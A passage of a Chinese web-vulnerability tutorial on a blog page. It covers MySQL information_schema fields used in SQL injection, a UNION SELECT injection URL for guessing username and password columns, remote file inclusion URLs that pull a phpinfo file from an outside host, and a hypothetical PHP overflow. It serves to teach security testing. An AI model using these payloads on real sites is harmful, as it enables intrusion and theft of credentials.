//&#x5982;&#x679C;&#x6267;&#x884C;&#x8FD9;&#x6761;&#x8BED;&#x53E5;&#x662F;&#x53EF;&#x884C;&#x7684;,&#x90A3;&#x4E48;&#x606D;&#x559C;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x66F4;&#x591A;&#x7684;&#x6570;&#x636E;&#x5E93;&#x4FE1;&#x606F;&#x4E86;:)<br/>&#x4E0A;&#x9762;&#x6211;&#x66FE;&#x7ECF;&#x63D0;&#x5230;&#x8FC7;&#x4F7F;&#x7528;&#x6570;&#x636E;&#x5E93;&#x7684;&#x5143;&#x6570;&#x636E;&#x6765;&#x83B7;&#x53D6;mysql&#x7684;&#x4FE1;&#x606F;,&#x5C31;&#x662F;&#x8FD9;&#x91CC;&#x7684;&#x8FD9;&#x4E2A;&#x529E;&#x6CD5;,&#x5F53;&#x7136;&#x524D;&#x63D0;&#x662F;&#x7CFB;&#x7EDF;&#x7BA1;&#x7406;&#x5458;&#x6CA1;&#x6709;&#x7981;&#x6B62;mysql&#x666E;&#x901A;&#x7528;&#x6237;&#x5BF9;&#x5143;&#x6570;&#x636E;&#x5E93;&#x7684;&#x8868;&#x67E5;&#x8BE2;,&#x5982;&#x679C;&#x7981;&#x6B62;&#x4E86;&#x5219;&#x8BE5;&#x529E;&#x6CD5;&#x662F;&#x65E0;&#x6548;&#x7684;.&#x5728;&#x5F00;&#x59CB;&#x5206;&#x6790;mysql&#x6570;&#x636E;&#x5E93;&#x5230;&#x5E95;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x5230;&#x90A3;&#x79CD;&#x7A0B;&#x5EA6;&#x7684;&#x6CE8;&#x5165;&#x60C5;&#x51B5;&#x4E0B;,&#x6211;&#x82B1;&#x4E86;&#x4E00;&#x5929;&#x7684;&#x65F6;&#x95F4;&#x5206;&#x6790;&#x4E86;mysql&#x7684;&#x7CFB;&#x7EDF;&#x67B6;&#x6784;,&#x6700;&#x7EC8;&#x53D1;&#x73B0;&#x901A;&#x8FC7;information_schema&#x6570;&#x636E;&#x5E93;&#x63D0;&#x4F9B;&#x7ED9;mysql&#x7528;&#x6237;&#x7684;&#x5143;&#x6570;&#x636E;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x4E00;&#x4E9B;mysql&#x6570;&#x636E;&#x5E93;&#x7684;&#x57FA;&#x672C;&#x4FE1;&#x606F;,&#x4F8B;&#x5982;&#x5F97;&#x5230;&#x6570;&#x636E;&#x5E93;&#x7684;&#x5404;&#x4E2A;&#x8868;&#x4FE1;&#x606F;&#x7B49;,&#x8FD8;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x6570;&#x636E;&#x5E93;&#x7684;&#x6743;&#x9650;&#x8BBE;&#x7F6E;&#x7B49;&#x4FE1;&#x606F;,&#x4E0B;&#x9762;&#x7684;&#x5185;&#x5BB9;&#x5C5E;&#x4E8E;&#x4E34;&#x65F6;&#x589E;&#x52A0;&#x7684;&#x4E00;&#x4E2A;&#x7AE0;&#x8282;,&#x6211;&#x4EEC;&#x4E00;&#x8D77;&#x6765;&#x8BA8;&#x8BBA;&#x4E0B;information_schema&#x6570;&#x636E;&#x5E93;&#x7684;&#x4E00;&#x4E9B;&#x6211;&#x4EEC;&#x7528;&#x5230;&#x7684;&#x8868;&#x7684;&#x5177;&#x4F53;&#x5B57;&#x6BB5;&#x5230;&#x5E95;&#x662F;&#x5E72;&#x4EC0;&#x4E48;&#x7684;:)<br/>1: KEY_COLUMN_USAGE&#x8868;<br/>constraint_schema: &#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x540D;<br/>table_schema: &#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x540D;<br/>table_name: &#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x8868;&#x4FE1;&#x606F;<br/>column_name: &#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x7684;&#x5B57;&#x6BB5;&#x4FE1;&#x606F;,&#x4E00;&#x822C;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;&#x7B2C;&#x4E00;&#x4E2A;&#x5B57;&#x6BB5;&#x6216;&#x8005;&#x81EA;&#x589E;&#x5B57;&#x6BB5;&#x7684;&#x4FE1;&#x606F;<br/>2: SCHEMA&#x8868;<br/>schema_name: &#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x540D;<br/>default_charater_set_name: &#x5B58;&#x653E;charset&#x7C7B;&#x578B;<br/>default_collation_name: &#x5B58;&#x653E;charset&#x76F8;&#x5173;&#x4FE1;&#x606F;<br/>3: SCHEMA_PRIVILEGES&#x8868;<br/>grantee: &#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x7528;&#x6237;&#x540D;<br/>table_schema: &#x8868;&#x540D;<br/>privilege_type: &#x6743;&#x9650;<br/>4: STATISTICS&#x8868;<br/>table_schema: &#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x540D;<br/>table_name: &#x5B58;&#x653E;&#x8868;&#x540D;<br/>index_schema: &#x6570;&#x636E;&#x5E93;&#x540D;<br/>index_name: &#x662F;&#x5426;&#x7F29;&#x5F15;?<br/>column_name: &#x5B58;&#x653E;&#x7D22;&#x5F15;&#x81EA;&#x589E;&#x5B57;&#x6BB5;?<br/>5: TABLES&#x8868;<br/>table_schema: &#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x540D;<br/>table_name: &#x5B58;&#x653E;&#x8868;&#x540D;<br/>table_type: &#x8868;&#x7C7B;&#x578B; SYSTEM o&#114; BASE TABLE<br/>engin: MEMORY MYISAM InnoDB<br/>version:<br/>table_rows:&#x8868;&#x7684;&#x884C;&#x6570;<br/>auto_increment: &#x81EA;&#x589E;&#x7684;&#x603B;&#x884C;&#x6570;<br/>cr&#101;ate_time: &#x521B;&#x5EFA;&#x8868;&#x7684;&#x65F6;&#x95F4;<br/>up&#100;ate_time: &#x66F4;&#x65B0;&#x8868;&#x7684;&#x65F6;&#x95F4;<br/>cr&#101;ate_options: &#x521B;&#x5EFA;&#x8868;&#x65F6;&#x7684;&#x7EA6;&#x675F;&#x6761;&#x4EF6;<br/>...<br/>&#x6709;&#x4E86;&#x8FD9;&#x4E9B;&#x4EE5;&#x540E;,&#x5982;&#x679C;&#x5BF9;&#x65B9;&#x7CFB;&#x7EDF;&#x7BA1;&#x7406;&#x5458;&#x5FFD;&#x7565;&#x4E86;&#x8FD9;&#x4E9B;,&#x5219;&#x53EF;&#x4EE5;&#x8FBE;&#x5230;&#x6211;&#x4EEC;&#x4E0D;&#x9700;&#x8981;&#x731C;&#x6D4B;&#x8868;&#x540D;&#x800C;&#x76F4;&#x63A5;&#x83B7;&#x53D6;&#x6570;&#x636E;&#x5E93;&#x8868;&#x540D;&#x7684;&#x7ED3;&#x679C;.&#x6211;&#x5728;&#x672C;&#x5730;&#x6D4B;&#x8BD5;&#x65F6;&#x4E00;&#x5207;OK:)<br/>&#x731C;&#x6D4B;&#x5217;&#x540D;:<br/>http://website/index1.php?id=1 and 1=1 union sel&#101;ct username,2,3,4 from user wh&#101;re 1=2 &#x6309;&#x7167;&#x8FD9;&#x4E2A;&#x89C4;&#x5219;&#x4F9D;&#x6B21;&#x7C7B;&#x63A8;,&#x5982;&#x679C;&#x6211;&#x4EEC;&#x731C;&#x6D4B;&#x5230;user&#x8868;&#x5B58;&#x5728;username&#x5B57;&#x6BB5;,&#x5219;&#x7A0B;&#x5E8F;&#x6267;&#x884C;&#x662F;&#x6B63;&#x5E38;&#x7684;,&#x5426;&#x5219;&#x7A0B;&#x5E8F;&#x4F1A;&#x51FA;&#x9519;,&#x4E5F;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;wh&#101;re 1=1&#x6765;&#x6253;&#x5370;&#x8868;&#x7684;&#x4FE1;&#x606F;,&#x901A;&#x8FC7;&#x8FD9;&#x6837;&#x7684;&#x529E;&#x6CD5;&#x5C31;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;mysql&#x6570;&#x636E;&#x5E93;&#x7684;&#x67D0;&#x4E9B;&#x5173;&#x952E;&#x8868;&#x7684;&#x5B57;&#x6BB5;&#x4FE1;&#x606F;,&#x5982;:admin&#x4E0E;password:)<br/>C: &#x6587;&#x4EF6;&#x5305;&#x542B;&#x6F0F;&#x6D1E;<br/>&nbsp;&nbsp;&#x6587;&#x4EF6;&#x5305;&#x542B;&#x6F0F;&#x6D1E;&#x7684;&#x6D4B;&#x8BD5;,&#x6709;&#x4EE5;&#x4E0B;&#x51E0;&#x4E2A;&#x6BD4;&#x8F83;&#x7B80;&#x5355;&#x4E14;&#x6709;&#x6548;&#x7684;&#x529E;&#x6CD5;.<br/>1: &#x65B0;&#x5EFA;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;php&#x4EE3;&#x7801;,&#x5982;:&lt;? phpinfo(); ?&gt;,&#x4FDD;&#x5B58;&#x4E3A;*.txt&#x683C;&#x5F0F;<br/>2: &#x65B0;&#x5EFA;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;php&#x4EE3;&#x7801;,&#x5982;:&lt;? phpinfo(); ?&gt;,&#x4FDD;&#x5B58;&#x4E3A;&#x65E0;&#x540E;&#x7F00;&#x683C;&#x5F0F;<br/>&#x7136;&#x540E;&#x6211;&#x4EEC;&#x6D4B;&#x8BD5;&#x65F6;&#x53EA;&#x9700;&#x8981;&#x91C7;&#x53D6;&#x4E0B;&#x9762;&#x7B80;&#x5355;&#x7684;&#x529E;&#x6CD5;&#x5373;&#x53EF;,&#x8FD9;&#x91CC;&#x6211;&#x4EEC;&#x5047;&#x8BBE;&#x6211;&#x4EEC;&#x4E0B;&#x9762;&#x7684;&#x6587;&#x4EF6;URL&#x4E3A;:<br/>http://bbs.cciss.cn/include.txt<br/>http://bbs.cciss.cn/include<br/>&#x6F0F;&#x6D1E;&#x89C4;&#x5219;:<br/>http://website/file.php?inc=http://bbs.cciss.cn/include.txt<br/>http://website/file.php?inc=http://bbs.cciss.cn/include.txt?<br/>http://website/file.php?inc=http://bbs.cciss.cn/include?<br/>http://website/file.php?inc=http://bbs.cciss.cn/include<br/>&#x4F7F;&#x7528;&#x4E0A;&#x9762;&#x7684;&#x7B80;&#x5355;&#x89C4;&#x5219;&#x5373;&#x53EF;&#x5B9E;&#x73B0;&#x6587;&#x4EF6;&#x5305;&#x542B;&#x6F0F;&#x6D1E;&#x7684;&#x6D4B;&#x8BD5;,&#x5F53;&#x7136;&#x5F97;&#x6839;&#x636E;&#x5177;&#x4F53;&#x7684;&#x8FD4;&#x56DE;&#x4FE1;&#x606F;&#x6765;&#x5224;&#x65AD;.&#x4F8B;&#x5982;&#x4ECE;XSS&#x6F0F;&#x6D1E;&#x7684;&#x68C0;&#x6D4B;&#x89C4;&#x5219;&#x53EF;&#x80FD;&#x4F1A;&#x53D1;&#x73B0;&#x5305;&#x542B;&#x6587;&#x4EF6;&#x6F0F;&#x6D1E;:)<br/>&#x5982;&#x679C;&#x6211;&#x4EEC;&#x77E5;&#x9053;PHP&#x7684;&#x67D0;&#x4E2A;&#x51FD;&#x6570;&#x5B58;&#x5728;&#x7F13;&#x51B2;&#x533A;&#x6EA2;&#x51FA;,&#x6211;&#x4EEC;&#x5047;&#x8BBE;&#x8FD9;&#x4E2A;PHP&#x7684;&#x5185;&#x7F6E;&#x51FD;&#x6570;&#x4E3A;phphtml(char *str),&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5982;&#x4F55;&#x5229;&#x7528;&#x8FD9;&#x6837;&#x7684;&#x6F0F;&#x6D1E;&#x5462;?&#x6211;&#x4EEC;&#x5047;&#x8BBE;http://website/file.php?inc=test,&#x8FD9;&#x91CC;&#x7684;&#x53C2;&#x6570;inc&#x7ECF;&#x8FC7;PHP&#x4EE3;&#x7801;&#x65F6;&#x4F7F;&#x7528;&#x4E86;phphtml&#x5185;&#x7F6E;&#x51FD;&#x6570;,&#x5219;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x4E0B;&#x9762;&#x7684;&#x529E;&#x6CD5;&#x6765;&#x89E6;&#x53D1;&#x6F0F;&#x6D1E;<br/>http://website/file.php?inc=11111111111....n(n&#x4E3A;&#x89E6;&#x53D1;&#x6F0F;&#x6D1E;&#x7684;&#x6700;&#x5927;&#x5B57;&#x7B26;&#x6570;)&#x5F53;&#x7136;&#x7C7B;&#x4F3C;&#x8FD9;&#x6837;&#x7684;&#x6F0F;&#x6D1E;&#x662F;&#x9700;&#x8981;&#x5199;&#x7A0B;&#x5E8F;&#x6765;&#x81EA;&#x52A8;&#x8FD0;&#x884C;&#x7684;,&#x7136;&#x540E;&#x6765;&#x89E6;&#x53D1;&#x6EA2;&#x51FA;&#x5E76;&#x6267;&#x884C;shellcode.&#x4F46;&#x8FD9;&#x91CC;&#x4E5F;&#x5B58;&#x5728;&#x4E00;&#x4E2A;&#x95EE;&#x9898;,&#x5373;&#x4E00;&#x822C;&#x60C5;&#x51B5;&#x4E0B;,&#x7C7B;&#x4F3C;PHP&#x672C;&#x8EAB;&#x7684;&#x6EA2;&#x51FA;&#x6F0F;&#x6D1E;&#x7684;&#x5229;&#x7528;&#x662F;&#x6709;&#x4E9B;&#x96BE;&#x5EA6;&#x5B58;&#x5728;&#x7684;.<br/>&#x603B;&#x7ED3;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#x9488;&#x5BF9;WEB&#x6F0F;&#x6D1E;&#x7684;&#x6316;&#x6398;,&#x89C4;&#x5219;&#x6709;N&#x591A;,&#x5176;&#x4E2D;&#x8FD8;&#x6709;&#x5F88;&#x591A;&#x53D8;&#x79CD;&#x7684;&#x89C4;&#x5219;.&#x8FD9;&#x91CC;&#x8BF4;&#x7684;&#x57FA;&#x672C;&#x4E0A;&#x662F;&#x4E00;&#x4E9B;&#x53EF;&#x4EE5;&#x7B80;&#x5355;&#x91C7;&#x53D6;&#x624B;&#x5DE5;&#x529E;&#x6CD5;&#x6D4B;&#x8BD5;&#x7684;&#x89C4;&#x5219;,&#x66F4;&#x591A;&#x7684;&#x89C4;&#x5219;&#x662F;&#x4F9D;&#x9760;&#x7ECF;&#x9A8C;&#x4E0D;&#x65AD;&#x79EF;&#x7D2F;&#x6240;&#x81F4;:)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#x672C;&#x6587;&#x6BD4;&#x8F83;&#x7B80;&#x5355;,&#x4E5F;&#x6CA1;&#x6709;&#x4EC0;&#x4E48;&#x6280;&#x672F;&#x542B;&#x91CF;,&#x53EA;&#x662F;&#x770B;&#x5230;xfocus&#x4E0A;&#x4ECB;&#x7ECD;WEB&#x6F0F;&#x6D1E;&#x7684;&#x6587;&#x7AE0;&#x8F83;&#x5C11;,&#x6240;&#x4EE5;&#x624D;&#x60F3;&#x5230;&#x63D0;&#x4EA4;&#x4E0B;,&#x5E0C;&#x671B;&#x5BF9;&#x5927;&#x5BB6;&#x6709;&#x6240;&#x5E2E;&#x52A9;.<br/>write by 7all</p><p> + <a href="#CommentCard">&#x67E5;&#x770B;&#x5F53;&#x524D;&#x65E5;&#x5FD7;&#x8BC4;&#x8BBA;</a> (1)</p><p>&nbsp;<br/><br/><a href="wap.asp?do=Login">&#x767B;&#x5F55;</a></p><p><br/>&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;</p><p><a href="wap.asp">&#x6728;&#x5B50;&#x5C4B;</a></p><p><a href="http://www.pjhome.net/wap.asp">PJBlog3&nbsp;v3.2.9.518</a>&nbsp;Inside.</p><p>Processed&nbsp;In&nbsp;0.096&nbsp;ms</p><do type="prev" label="&#x8FD4;&#x56DE;"><prev/></do></card><card id="postCommentCard"><p><b>&#x6807;&#x9898;&#x3A;</b> <a href="#MainCard">&#x57;&#x45;&#x42;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x6280;&#x672F;</a></p><p><br/>你没有权限发表评论</p><p><br/>&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;</p><p><a href="wap.asp">&#x6728;&#x5B50;&#x5C4B;</a></p><p><a href="http://www.pjhome.net/wap.asp">PJBlog3&nbsp;v3.2.9.518</a>&nbsp;Inside.</p><p>Processed&nbsp;In&nbsp;0.096&nbsp;ms</p><do type="prev" label="&#x8FD4;&#x56DE;"><prev/></do></card><card id="CommentCard"><p>&#x6682;&#x65E0;&#x8BC4;&#x8BBA;</p><p><a href="#MainCard">&#x8FD4;&#x56DE;</a></p><p><br/>&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;</p><p><a href="wap.asp">&#x6728;&#x5B50;&#x5C4B;</a></p><p><a href="http://www.pjhome.net/wap.asp">PJBlog3&nbsp;v3.2.9.518</a>&nbsp;Inside.</p><p>Processed&nbsp;In&nbsp;0.096&nbsp;ms</p><do type="prev" label="&#x8FD4;&#x56DE;"><prev/></do></card>
</wml>
